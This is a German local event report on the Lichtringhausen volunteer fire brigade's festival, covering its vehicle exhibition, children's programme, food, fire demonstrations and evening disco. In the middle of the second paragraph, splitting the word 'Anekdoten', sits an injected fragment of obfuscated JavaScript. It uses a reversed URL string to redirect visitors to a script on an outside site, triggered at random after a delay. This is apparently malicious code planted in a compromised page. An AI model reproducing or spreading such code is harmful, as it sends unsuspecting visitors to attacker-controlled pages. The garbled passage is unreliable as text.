Skip to content Skip to main navigation Skip to footer

Feuerwehrfest

This event has ended

Bericht: Stefan Aschauer-Hundt

Inflationär feiern sie nicht, die Lichtringhauser Blauröcke – nur in jedem zweiten Jahr steigt das Lichtringhauser Feuerwehrfest. Dafür aber wartet die Löschgruppe jedes Mal mit einer Überraschung und einem feinen Programm auf, das allen Generationen etwas bietet und Dorffestcharakter hat. „Wir haben zur Zeit keine Dorfkneipe und deshalb ersetzt das Feuerwehrfest den Stammtisch“, sagt Brandinspektor Frank Schmidt, Zugführer des Löschzuges Ebbe und Lichtringhauser Löschgruppenmitglied. Er gehört zum Organisationsteam des Feuerwehrfestes, das am Samstag, 31. August, rund um das Gerätehaus an der Bieke 14 und auf dem Schulhof stattfindet.

Diesmal möchten die Feuerwehrkameraden wieder ein reiches Programm rund um Brandschutz und Blaulicht bieten. Das Wehrfest beginnt um 15 Uhr; dann sind bereits Löschfahrzeuge aus 70 Jahren Feuerwehrgeschichte auf dem Schulhof aufgefahren. Frank Schmidt: „Wir wollen zeigen, wie sich die Fahrzeugtechnik über die Generationen entwickelt hat – vom Löschfahrzeug der 50er Jahre, bei dem es vor allem auf Wasser, Schläuche und die Mannschaft ankam, über die Fahrzeugkonzepte der 80er und 90er-Jahre, als die technische Hilfe immer wichtiger wurde, bis hin zur heutigen Zeit, in der Löschen, technische Hilfeleistung, Umweltschutz zu leisten und alle möglichen Anforderungen zu erfüllen sind.“ Es dürfte für Autoenthusiasten, Feuerwehr-Interessierte wie für Bürger wie Du und ich eine spannende Schau sein, den automobilen Bogen von der Nachkriegszeit bis in die Jetztzeit zu schlagen, zumal es zu allen ausgestellten Fahrzeugen gerne Erklärungen gibt und gewiss auch Anektoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doten zu erzählen sind.

Derweil bringt sich die Jugendfeuerwehr mit einem Kinderprogramm ins Geschehen ein: Auch für die Kleinen und für den Nachwuchs gibt es Spannung, Spiele, Aktion. Ein großes Kuchenbüfett und eine Waffelbäckerei laden ab 15 Uhr zum Kaffeeklatsch ein; am Bierrondell und im Zelt vor dem Gerätehaus kann man verweilen, Klönen und Leute treffen. Leckereien für jeden Geschmack werden angeboten: Es gibt eine neue Imbissbude; offeriert werden u.a. Bratwurst, Pommes Frites und als neue Attraktion drei verschiedene Burger.

Gegen 17 Uhr werden die Lichtringhauser Feuerwehrkameraden moderierte Brandbekämpfungs-Vorführungen auf dem Schulhof unternehmen. An einem Brandhaus wird man sehen können, wie schnell sich eine züngelnde Flamme zum Vollbrand entwickelt und wie sich Rauchgase zügig ausbreiten. Anhand dieser spannenden Vorführung kann man erkennen, wie wichtig Heimrauchmelder sind, aber auch, wie wichtig es ist, eigenen vorbeugenden Brandschutz zu betreiben.

Abends geht das Feuerwehrfest über in ein geselliges Miteinander. In der Fahrzeughalle öffnet dann die „Blaulichtbar“ und die „112-Disco“ wird angeworfen. Auch jetzt sind – die Bambini einmal ausgenommen – beim Dorftreff im Gerätehaus alle Generationen willkommen. Zugführer Frank Schmidt: „Das Schönste ist, wenn sich das ganze Dorf bei uns trifft und wir bei einem solchen Fest auch noch rüberbringen können, was Feuerwehrarbeit und ein Ehrenamt eigentlich bedeuten.“